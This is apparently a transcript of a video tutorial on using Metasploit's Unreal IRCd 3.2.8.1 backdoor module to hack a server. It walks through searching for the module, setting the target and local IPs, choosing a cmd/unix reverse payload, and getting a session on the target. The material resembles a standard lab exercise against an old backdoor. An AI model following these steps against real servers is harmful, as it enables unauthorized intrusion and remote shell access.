Welcome. In this video, we are going to learn Payload Backdoor for hacking servers in Metasploit. This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal 3.2.8.1 tar.gz archive between November 2009 and June 12, 2010. Let's open up terminal, load MSF console. Let's search Unreal 3.2.1.8 module. Here you can see that exploit/Unix/Unreal IRCD 3281 backdoor. Type info exploit Unix Unreal IRCD 3281_backdoor. Here you can see that module information, load module type, use exploit Unix IRC Unreal IRCD 3281 backdoor, type show options. Here you can see basic option. Let's set option value, type set rhost 192.168.1.108. Let's see the payload type. Show payloads. Here you can see that Linux payloads. Set payload as CMD Unix reverse. Here you can see that payload is set. Open up another terminal and type ifconfig. Here you can see that localhost IP address for Kali OS is set lhost as 192.168.1.10. Exploit it. Here you can see that we get Metasploit session on 192.168.1.108 target host. So that's it in this video on Payload Backdoor for hacking server. Thank you for watching this video.